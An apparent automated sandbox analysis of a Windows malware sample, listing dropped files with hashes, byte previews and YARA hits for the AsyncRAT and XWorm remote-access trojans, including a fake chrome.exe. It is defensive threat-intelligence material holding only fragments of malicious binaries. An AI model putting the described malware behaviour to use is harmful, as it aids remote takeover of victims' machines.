                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):692064
                                      Entropy (8bit):7.194014407923939
                                      Encrypted:false
                                      SSDEEP:12288:IskY7gjcjhVIEhqgM7bWvcsi6aVUfIy+U40vy3W/ceKSHMsiFyY6XNmnMwJ:IsZgjS1hqgSC/izkfFjymk4HM5yJwMK
                                      MD5:449FF18CECF6F5F51192A3B2DED55D19
                                      SHA1:344C9315CC65A9A8B57B7CA713EDDCFC00BD7A93
                                      SHA-256:0F891BFC3F74490937A0A339092EC8515409EC972B0EE12A7F3A21EA039CD706
                                      SHA-512:474720A4D8E0E992343DE1A897072C9062A5149E4F235013A28DF8C1DBA19020EA894231C1AAB7F5B3C041FD67CF3B2A26E5B25C7D6901FB4B0BEFCCB57957B4
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:modified
                                      Size (bytes):2232
                                      Entropy (8bit):5.38001807625381
                                      Encrypted:false
                                      SSDEEP:48:jWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugei/ZvUyus:jLHyIFKL3IZ2KRH9Oug8s
                                      MD5:CAFED418AEAEA20F09A79022ADF107E0
                                      SHA1:FF343B0D653868819AF4032F2C7A4A802A4F3B0E
                                      SHA-256:9F9D5A9B504828F7AAF44339E735DECA0D78532F948CE057A2D8F841B8CF5424
                                      SHA-512:F4EF3760C696C5F5F3D45224543F006D4DC47053179254E314F5DBCB2CD8F3265005CC23B4022F1FA27A8275B40D952968180E90F36C3091C210F9AF751DE7CE
                                      Malicious:false
                                      Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                      C:\Users\user\AppData\Local\Temp\3582-490\x.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):46592
                                      Entropy (8bit):5.848041824576861
                                      Encrypted:false
                                      SSDEEP:768:B68rPcT5+tkzOGvAX8WuFZ4hJF5PC9O9W68OMhl3/OV/8:08r8ItiOeW894Fc9UW68OM3eE
                                      MD5:9F4FFCEB9E7905107492815B7EBFDC13
                                      SHA1:417E66C983CE65D0588CAB57EBDAD317A9FEF818
                                      SHA-256:6FB45016BB75A9968AE3ADC15A03B8C2E94BD22342F306F1E52A03BF498D5AF9
                                      SHA-512:E724C98562C96CB5F8AEC64167DFC122FA005AF06D1A4A20DC58549D20966DA0B722D58C16330785B8AF2435A199436DD1723AECC21FA127A65B4A8F44452357
                                      Malicious:true
                                      Yara Hits:
                                      • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe, Author: Joe Security
                                      • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe, Author: Joe Security
                                      • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe, Author: Joe Security
                                      • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\3582-490\x.exe, Author: ditekSHen
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....|f................................. ........@.. ....................................@.....................................W.................................................................................... ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B.......................H.......|]..(Z............................................................(....*..(....*.s.........s.........s.........s.........*...0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0..........~....o.....+..*..0............(....(.....+..*....0...........(.....+..*..0...............(.....+..*..0...........(.....+..*..0................-.(...+.+.+...+..*.0.........................*..(....*.0.. .......~.........-.(...+.....~.....+..*..(....*.0..

                                      C:\Users\user\AppData\Local\Temp\Log.tmp

                                      Download File
                                      Process:C:\Users\user\AppData\Local\Temp\3582-490\x.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:modified
                                      Size (bytes):54
                                      Entropy (8bit):4.456017770914996
                                      Encrypted:false
                                      SSDEEP:3:rRSF1M4W3+dKSAmNS/Fsra:EFG4pKSA6S/Wra
                                      MD5:DC56B8F5D6A48BF67D88D1622EF86336
                                      SHA1:54476F55D0CD6E9368F2A6F67E36E1296E30FC1D
                                      SHA-256:9D41F07F85D2B9008A92D805C9B2F261B34CAE813086C888BE2FC1C820AF111B
                                      SHA-512:815847D233ADE33884D7B35EA8C109FA7B5E87C0222FA5D47D73A7CD5C592B1140E3927D2D8E677F19DCC514DDCAADC7C983E60FF03DD90965087EA0CEB46B9A
                                      Malicious:false
                                      Preview:....### Administrator: Windows PowerShell ###..[WIN]r

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2cbsypgj.c4c.ps1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3gs332ou.mfc.psm1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4llzpea3.g3f.psm1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g0vzrbmt.zgv.ps1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g4c20dzv.aed.ps1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ivoxms4b.2oc.psm1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ixtvzzfz.52k.psm1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ldfn2iji.zvg.ps1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o4ygcr2q.p44.ps1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qprp5jsv.tsr.psm1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_swpw52rp.zt3.psm1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tvq4qe4z.31f.ps1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xbh2255q.cvx.ps1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xfc23mpl.kwl.psm1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y05p14tz.0fh.psm1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yk2pssit.ifk.ps1

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):60
                                      Entropy (8bit):4.038920595031593
                                      Encrypted:false
                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                      Malicious:false
                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                      C:\Users\user\AppData\Local\Temp\chrome.exe

                                      Download File
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):182272
                                      Entropy (8bit):6.778841629892176
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCe7WLuzeHpl18fCtnRPF9EVnb43jaI5gr/uHqZLWfp2KkvL5kdnQB:PueqmCtnRPF9cCGr/uH0gkSdQB
                                      MD5:D307A8D049BC1C09C5C3B972F3609FD3
                                      SHA1:D84D853F3BD3E3DADFE2CB5E4A294B83780A3F3D
                                      SHA-256:C8FB712D11C1F2AE2BC71F58C2D859B0F2F45AA9ED88F6C9F42E89217D03DF48
                                      SHA-512:7D3DE68A9DC7AD364B0E8A37F8A56E556FF774537FDF93AF869BEA4CD14DDD3C0205BD74FBDD66FCDAB5F1FA6E9D5F10F3C8C66D99BF5235109DE51975A2BF7F
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                      C:\Users\user\AppData\Local\Temp\tmp5023.tmp

                                      Download File
                                      Process:C:\Windows\svchost.com
                                      File Type:data
                                      Category:modified
                                      Size (bytes):8
                                      Entropy (8bit):3.0
                                      Encrypted:false
                                      SSDEEP:3:q7:q7
                                      MD5:81601EB2959385FC7502FE6AF57DA701
                                      SHA1:15622FF1D9E23DE872ED80A80055355AF044D4F9
                                      SHA-256:5FA988F654DC6BC0153ABBCC314A11B24EBF1FB8900AE07F31463B211FECEB65
                                      SHA-512:D6F8841D246073760C0D37DA4B4BDD4A4FF46F6DA3480BC74AB9CD6C844E2FB269721BD54B782B87ECC860A5192059BAE3B9015CEDE333BF391BDCB97BAD9A4D
                                      Malicious:false
                                      Preview:.W....&A

                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7G46U5J9MCOHHB2YX6CQ.temp

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):6225
                                      Entropy (8bit):3.7547334453049617
                                      Encrypted:false
                                      SSDEEP:96:4dIFdyC98EQkvhkvCCtCGpLvDHRGpLvDHZ:2IFFmCGpL1GpLV
                                      MD5:19EC303860747D7B89A87F6B714D29BF
                                      SHA1:5E92810EF1073EEBC15647DC0017BD4F3CA45EBA
                                      SHA-256:F492A7CB8C59B4054B6DD89A5DA477C71B718912DBED64A2E357D8054858629B
                                      SHA-512:73F8B9D68E875DA0126BE3AAA7EDA4AC969A8822514CA0822C1B9FFE89E026F1700AA7874AD7BEDD6B2BD199C58C8DF953B897F1BDE3629220F0FE89B9DD49CF
                                      Malicious:false
                                      Preview:...................................FL..................F.".. .....*_....(.._...z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_....d.;....s.D.......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=.X............................3*N.A.p.p.D.a.t.a...B.V.1......Xz&..Roaming.@......EW.=.X./...........................\+.R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=.X./..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=.X./..............................W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=.X./....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=.X./....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=.X./..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=EW.=....9...........

                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LHEPMEXKDNKGVL8ATG5L.temp

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):6225
                                      Entropy (8bit):3.753421903046966
                                      Encrypted:false
                                      SSDEEP:96:4BIFdyC98EQkvhkvCCtCGpLvDHRGpLvDHZ:OIFFmCGpL1GpLV
                                      MD5:208069C7E84E357F9BB613F474EB2DA5
                                      SHA1:2FE50506755FF2CB751FBC0FFAC30FE6C32F4D24
                                      SHA-256:E563ADFD6636076E6ABCFD833D93F29E5FE0800B4B95CD7AD51241EB37B4B14A
                                      SHA-512:BEF0A0E8E82F85A5BCBD424F6B508C0E6704992AEB38D2342B73AFC2D5C7421067EB53C6EBFC3C11E1657615DFD97399995AF64461342AFD397C2132C2FCCD87
                                      Malicious:false
                                      Preview:...................................FL..................F.".. .....*_....(.._...z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_....d.;...Ee..D.......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=.X............................3*N.A.p.p.D.a.t.a...B.V.1......Xz&..Roaming.@......EW.=.X./...........................\+.R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=.X./..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=.X./..............................W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=.X./....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=.X./....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=.X./..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=EW.=....9...........

                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QB8UZYK2CA73L16SLSIP.temp

                                      Download File
                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):6225
                                      Entropy (8bit):3.7508801949426926
                                      Encrypted:false
                                      SSDEEP:96:4BaiHCTCXrEQkvhkvCCtCn5LvDHRn5LvDHZ:uaiDzCn5L1n5LV
                                      MD5:92E0FB9048CC5DC32C5FD809A346FB11
                                      SHA1:D96C6A41766954D2D61D828BAE6C26C71BE78465
                                      SHA-256:59535697451D594D1C929AA0C54B62BDB21553E8F4249E5C4DA5A20DADD5026B
                                      SHA-512:A34BCE9ED22B9E494FC886BEA3BF72C91B6A2EF301204A8FA206368765BAA59B54DD396A6C6923482DCF8FA26125827A85A4E503735DDE14C64C44DD41BBAFA5
                                      Malicious:false
                                      Preview:...................................FL..................F.".. .....*_....(.._...z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_....d.;.../.K.;.......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=.X{&..........................3*N.A.p.p.D.a.t.a...B.V.1......Xz&..Roaming.@......EW.=.Xz&...........................\+.R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=.Xw&..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=.Xw&..............................W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=.Xw&....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=.Xw&....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=EW.=....9...........

                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WU8EDVM8BJGECJW85P0I.temp

                                      Download File
